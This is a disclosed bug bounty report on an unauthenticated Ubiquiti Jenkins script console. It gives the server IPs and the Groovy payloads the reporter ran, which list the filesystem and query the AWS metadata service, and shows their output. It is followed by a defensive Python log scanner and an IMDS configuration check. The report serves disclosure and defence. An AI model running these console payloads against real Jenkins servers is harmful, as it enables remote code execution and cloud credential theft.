Public Jenkins instance with /script enabled
State Resolved (Closed)
Disclosed publicly 2018-09-10T16:21:17.097Z
Reported To
Weakness Code Injection
Bounty $2,500
Summary by smiegles

Ubiquiti exposed a Jenkins server on the internet without any authentication; this allowed me to reach the AWS metadata service and execute code on the server itself. They resolved the issue and rewarded a bounty within 30 minutes of reporting, really impressive.


Timeline
submitted a report to Ubiquiti Networks.
2018-08-31T12:05:04.584Z

Hi,

First of all, I'm not 100% able to verify that this server is actually owned by Ubnt as there are multiple DNS Names in the SSL certificate.

DNS Name: *.uum.com
DNS Name: *.ubnt.com
DNS Name: *.svc.ubnt.com
DNS Name: *.api.uum.com
DNS Name: *.svc.uum.com
DNS Name: uum.com

So, the server hosted on https://54.191.232.223/ and https://54.186.253.37/ is reachable from the internet and has the script console enabled.

You can execute code on it by going to: https://54.186.253.37/script and insert the following code:

"ls /".execute().text

Result:

bin
boot
dev
docker-java-home
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

It also allows reaching the AWS metadata server:

"curl http://169.254.169.254/latest/meta-data/".execute().text

Result:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

Impact

RCE


Regards,
Frans
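The report above shows two things a defender wants to catch: requests to the Jenkins script console (/script and its plain-text twin /scriptText) arriving from outside, and an EC2 instance whose metadata service is reachable by whatever runs on the box. The following is an added example written for this page, not code from the report or from Ubiquiti: a small detector that scans reverse-proxy access-log lines in front of Jenkins and grades each console hit, plus a check of the EC2 MetadataOptions structure (the field names HttpTokens, HttpPutResponseHopLimit and HttpEndpoint are those returned by describe-instances). The log lines, the addresses and the trusted network 10.0.0.0/8 are constructed for the example.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Constructed sample lines in Combined Log Format, as a reverse proxy in front of
# Jenkins would write them. Addresses, users and timestamps are invented.
SAMPLE_LOG = """\
10.0.3.15 - alice [31/Aug/2018:11:58:02 +0000] "GET /job/build-ui/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.77 - - [31/Aug/2018:12:01:44 +0000] "GET /script HTTP/1.1" 200 8731 "-" "Mozilla/5.0"
198.51.100.77 - - [31/Aug/2018:12:02:10 +0000] "POST /script?foo=1 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.3.15 - alice [31/Aug/2018:12:03:00 +0000] "POST /scriptText HTTP/1.1" 200 300 "-" "curl/7.58"
203.0.113.9 - - [31/Aug/2018:12:04:31 +0000] "GET /script/ HTTP/1.1" 403 512 "-" "python-requests"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Assumed trusted source ranges (your VPC / office CIDRs); anything else is external.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Both endpoints run Groovy inside the controller JVM: /script is the web form,
# /scriptText is the plain-text API used by the CLI and by automation.
CONSOLE_PATHS = {"/script", "/scriptText"}


@dataclass
class Finding:
    ts: str
    ip: str
    user: str
    method: str
    path: str
    status: int
    external: bool
    severity: str


def is_external(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True  # unparsable source: treat as untrusted
    return not any(addr in net for net in TRUSTED_NETS)


def normalize_path(raw: str) -> str:
    # Drop the query string and a trailing slash so "/script/?x=1" matches "/script".
    return raw.split("?", 1)[0].rstrip("/") or "/"


def severity_for(status: int, user: str, external: bool) -> str:
    if status != 200:
        return "blocked"   # authentication or authorization refused it; still worth counting
    if external:
        return "critical"  # console served to an address outside the trusted ranges
    if user == "-":
        return "high"      # anonymous access from inside: authentication is effectively off
    return "review"        # an authenticated user ran a script; audit what it did


def scan(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalize_path(m["path"])
        if path not in CONSOLE_PATHS:
            continue
        ext = is_external(m["ip"])
        status = int(m["status"])
        findings.append(Finding(m["ts"], m["ip"], m["user"], m["method"], path,
                                status, ext, severity_for(status, m["user"], ext)))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


def imds_issues(metadata_options: Dict) -> List[str]:
    """Flag weak EC2 instance metadata settings. Keys follow the MetadataOptions
    structure returned by ec2 describe-instances."""
    issues: List[str] = []
    if metadata_options.get("HttpEndpoint", "enabled") == "disabled":
        return issues  # IMDS off entirely: nothing for a compromised process to read
    if metadata_options.get("HttpTokens") != "required":
        issues.append("IMDSv1 allowed: a plain GET from any process on the host returns "
                      "the attached role's credentials")
    if metadata_options.get("HttpPutResponseHopLimit", 1) > 1:
        issues.append("hop limit > 1: containers on the host can complete the IMDSv2 "
                      "token handshake")
    return issues


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.severity:8} {f.ip:15} {f.user:6} {f.method} {f.path} {f.status}")
    print(summarize(scan(SAMPLE_LOG.splitlines())))
    print(imds_issues({"HttpTokens": "optional", "HttpPutResponseHopLimit": 2,
                       "HttpEndpoint": "enabled"}))
```

Feed `scan()` the lines of your proxy log; any "critical" or "high" finding means the console was served without a working authentication boundary, which is the condition the report describes. The IMDS check matters here because the directory listing in the report (docker-java-home) suggests Jenkins ran in a container: with IMDSv2 required and a hop limit of 1, the curl in the report would have returned nothing usable even after code execution.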

ubnt-rubens Activities::BugTriaged
2018-08-31T12:21:45.431Z
This server was intended to be used for test and with dummy data. Although it didn't contain any information and was not part of any UBNT system it was wrongly exposed to the internet.


Activities::BountyAwarded
2018-08-31T12:22:13.945Z


ubnt-rubens Activities::BugResolved
2018-08-31T12:22:27.990Z
Thank you and good luck with future bug hunting.


smiegles Activities::Comment
2018-08-31T12:23:54.572Z
Thank you for the ridiculously fast response and bounty!


smiegles Activities::AgreedOnGoingPublic
2018-09-08T23:40:55.218Z
Totally up to you but I felt like this was a great example of how bug bounties should be done.


ubnt-rubens Activities::AgreedOnGoingPublic
2018-09-10T16:21:16.930Z


ubnt-rubens Activities::ReportBecamePublic
2018-09-10T16:21:17.154Z